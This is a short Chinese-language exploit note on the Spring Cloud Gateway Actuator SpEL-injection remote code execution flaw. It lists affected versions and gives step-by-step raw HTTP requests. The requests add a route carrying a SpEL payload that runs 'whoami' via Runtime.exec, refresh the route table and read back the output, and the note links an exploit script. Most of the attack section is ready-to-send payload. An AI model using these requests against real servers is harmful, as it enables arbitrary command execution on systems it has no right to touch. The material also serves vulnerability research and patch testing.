原理
启用和暴露Gateway Actuator端点时,可用恶意的SpEL表达式被嵌入路由路径,在刷新路由时导致RCE。
参考文章:
https://blog.csdn.net/m0_61506558/article/details/126914956
影响范围
Spring Cloud Gateway < 3.1.1
Spring Cloud Gateway < 3.1.7
Spring Cloud Gateway 2.x
危害
远程攻击者可利用该漏洞可以发出恶意的请求,允许在远程主机上执行任意远程命令。
POC & EXP
手工
# 1. 请求http://x.x.x.x:x/actuator,确认端口开启
# 2. 新建一个路由,注入恶意的SpELl表达式,返回状态码应为201 Created
POST /actuator/gateway/routes/test HTTP/1.1
Host: x.x.x.x:x
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type:application/json
Content-Length: 298
{"id": "test","filters": [{"name": "AddResponseHeader","args": {"value":"#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}","name": "cmd"}}],"uri": "http://example.com:80","order": 0 }
# 3. 刷新路由表
POST /actuator/gateway/refresh HTTP/1.1
Host: x.x.x.x:x
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 3
a=1
# 4. 访问刚刚建立的路由,http://x.x.x.x:x/actuator/gateway/routes/test
脚本
https://github.com/lucksec/Spring-Cloud-Gateway-CVE-2022-22947